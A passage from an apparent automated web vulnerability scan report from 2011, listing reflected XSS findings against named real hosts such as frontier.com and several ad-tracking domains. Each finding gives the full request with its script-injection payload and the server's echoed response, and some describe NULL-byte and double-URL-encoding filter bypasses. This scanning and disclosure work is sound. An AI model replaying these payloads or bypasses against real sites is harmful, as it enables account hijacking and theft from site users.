Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
X-Cascade: pass
Content-Type: text/plain
Content-Length: 67
Date: Tue, 06 Sep 2011 12:49:57 GMT

Not Found: /yre/2010090893b5d<script>alert(1)</script>db9aaf04338/b

2.20. http://beacon.partners-z.com/yre/20100908/b [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.partners-z.com
Path:   /yre/20100908/b

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fb9e5<script>alert(1)</script>37006748ec was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /yre/20100908/bfb9e5<script>alert(1)</script>37006748ec?uuid=3c7f76504307f88c4e126d344670b7cc&prid=dcd1ff2f79f8a83b9c960316c4f85cf1&price=&lid=2124552455,2125516156,89336147,31505014,72516437,72538384,2125075536,79497737,2125160035,2124842339&p=10010&page=search& HTTP/1.1
Host: beacon.partners-z.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
X-Cascade: pass
Content-Type: text/plain
Content-Length: 66
Date: Tue, 06 Sep 2011 12:49:59 GMT

Not Found: /yre/20100908/bfb9e5<script>alert(1)</script>37006748ec

2.21. http://comcast-www.baynote.net/baynote/tags3/guide/results-xsl/comcast-www [elementIds parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comcast-www.baynote.net
Path:   /baynote/tags3/guide/results-xsl/comcast-www

Issue detail

The value of the elementIds request parameter is copied into the HTML document as plain text between tags. The payload %00ee062<script>alert(1)</script>6f2ae7bb9cf was submitted in the elementIds parameter. This input was echoed as ee062<script>alert(1)</script>6f2ae7bb9cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /baynote/tags3/guide/results-xsl/comcast-www?userId=6923713561343025788&customerId=comcast&code=www&id=1&query=xss&url=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&appendParams=&rankParam=&condition=d%26g%26s&elementIds=com_search_rightrail_b%00ee062<script>alert(1)</script>6f2ae7bb9cf&v=1 HTTP/1.1
Host: comcast-www.baynote.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: BNServer
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 156
Date: Tue, 06 Sep 2011 12:22:28 GMT


bnTagManager.getTag(1).divId = "com_search_rightrail_b.ee062<script>alert(1)</script>6f2ae7bb9cf";
bnResourceManager.registerResource("GLResults1");

2.22. http://comcastresidentialservices.tt.omtrdc.net/m2/comcastresidentialservices/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://comcastresidentialservices.tt.omtrdc.net
Path:   /m2/comcastresidentialservices/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 819af<script>alert(1)</script>f8868cea7a0 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/comcastresidentialservices/mbox/standard?mboxHost=sitesearch.comcast.com&mboxSession=1315327839174-766376&mboxPage=1315329733349-634146&mboxCount=1&internalkeyword=xss&mbox=Search_Image_Promos819af<script>alert(1)</script>f8868cea7a0&mboxId=0&mboxTime=1315311733394&mboxURL=http%3A%2F%2Fsitesearch.comcast.com%2F%3Fq%3Dxss%26cat%3Dcom%26con%3Dwww%26sec%3D%26PageName%3DLooking%252Bfor%2BProducts%2Band%2BPrices%253F&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: comcastresidentialservices.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=xss&cat=com&con=www&sec=&PageName=Looking%2Bfor+Products+and+Prices%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 215
Date: Tue, 06 Sep 2011 12:22:52 GMT
Server: Test & Target

mboxFactories.get('default').get('Search_Image_Promos819af<script>alert(1)</script>f8868cea7a0',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315327839174-766376.19");

2.23. http://event.adxpose.com/event.flow [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 18ccf<script>alert(1)</script>aa7f8549978 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D8383746361359954%3F&uid=TVYMYp4lQTRs9JsS_4098672818ccf<script>alert(1)</script>aa7f8549978&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1315331134985-48379358672536910&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=77EE7E015EE500AABD3FD55823F0F1DB; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Tue, 06 Sep 2011 12:46:01 GMT

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_4098672818ccf<script>alert(1)</script>aa7f8549978");

2.24. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72d0c%2527%253balert%25281%2529%252f%252f8df9650bb55 was submitted in the REST URL parameter 1. This input was echoed as 72d0c';alert(1)//8df9650bb55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering72d0c%2527%253balert%25281%2529%252f%252f8df9650bb55/CustomAppTabInfo/tabs.css HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering72d0c';alert(1)//8df9650bb55/CustomAppTabInfo/tabs.css');//]]>
...[SNIP]...

2.25. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 246a3%2527%253balert%25281%2529%252f%252fe03a978b338 was submitted in the REST URL parameter 2. This input was echoed as 246a3';alert(1)//e03a978b338 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/CustomAppTabInfo246a3%2527%253balert%25281%2529%252f%252fe03a978b338/tabs.css HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/CustomAppTabInfo246a3';alert(1)//e03a978b338/tabs.css');//]]>
...[SNIP]...

2.26. http://frontier.com/AgentOrdering/CustomAppTabInfo/tabs.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/CustomAppTabInfo/tabs.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ac67%2527%253balert%25281%2529%252f%252f9c77ef6d725 was submitted in the REST URL parameter 3. This input was echoed as 1ac67';alert(1)//9c77ef6d725 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/CustomAppTabInfo/tabs.css1ac67%2527%253balert%25281%2529%252f%252f9c77ef6d725 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/CustomAppTabInfo/tabs.css1ac67';alert(1)//9c77ef6d725');//]]>
...[SNIP]...

2.27. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa607%2527%253balert%25281%2529%252f%252f787cb7d4dcb was submitted in the REST URL parameter 1. This input was echoed as aa607';alert(1)//787cb7d4dcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrderingaa607%2527%253balert%25281%2529%252f%252f787cb7d4dcb/Login/ HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43627


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrderingaa607';alert(1)//787cb7d4dcb/Login/');//]]>
...[SNIP]...

2.28. http://frontier.com/AgentOrdering/Login/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44e10%2527%253balert%25281%2529%252f%252f43ea9213a24 was submitted in the REST URL parameter 2. This input was echoed as 44e10';alert(1)//43ea9213a24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /AgentOrdering/Login44e10%2527%253balert%25281%2529%252f%252f43ea9213a24/ HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43627


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/AgentOrdering/Login44e10';alert(1)//43ea9213a24/');//]]>
...[SNIP]...

2.29. http://frontier.com/BillPay/Login.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8990'%3b3ad87ec9c52 was submitted in the REST URL parameter 1. This input was echoed as c8990';3ad87ec9c52 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BillPayc8990'%3b3ad87ec9c52/Login.aspx HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43311


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?aspxerrorpath=/BillPayc8990';3ad87ec9c52/Login.aspx');//]]>
...[SNIP]...

2.30. http://frontier.com/BillPay/Login.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /BillPay/Login.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f062%2527%253balert%25281%2529%252f%252fa328f8cd333 was submitted in the REST URL parameter 2. This input was echoed as 3f062';alert(1)//a328f8cd333 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /BillPay/Login.aspx3f062%2527%253balert%25281%2529%252f%252fa328f8cd333 HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43593


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/BillPay/Login.aspx3f062';alert(1)//a328f8cd333');//]]>
...[SNIP]...

2.31. http://frontier.com/Controls/SharedWebMethods.aspx/GetCurrentLocale [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontier.com
Path:   /Controls/SharedWebMethods.aspx/GetCurrentLocale

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2a52%2527%253balert%25281%2529%252f%252f6141da654bb was submitted in the REST URL parameter 2. This input was echoed as b2a52';alert(1)//6141da654bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

POST /Controls/SharedWebMethods.aspxb2a52%2527%253balert%25281%2529%252f%252f6141da654bb/GetCurrentLocale HTTP/1.1
Host: frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
Content-Length: 12
Origin: http://frontier.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/json; charset=UTF-8
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da8508CMWUL; ASP.NET_SessionId=obmtq3qrw5huoh3ltwzo40av; CP=null*; s_cc=true; s_sq=%5B%5BB%5D%5D

{'href': ''}

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43807


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://frontier.com/PageNotFound.aspx?404;http://frontier.com:80/Controls/SharedWebMethods.aspxb2a52';alert(1)//6141da654bb/GetCurrentLocale');//]]>
...[SNIP]...

2.32. http://frontier.com/Controls/VirtualCode.ashx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://frontier.com
Path:   /Controls/VirtualCode.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56e88'%3b3d6207f3d2f was submitted in the REST URL parameter 1. This input was echoed as 56e88';3d6207f3d2f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

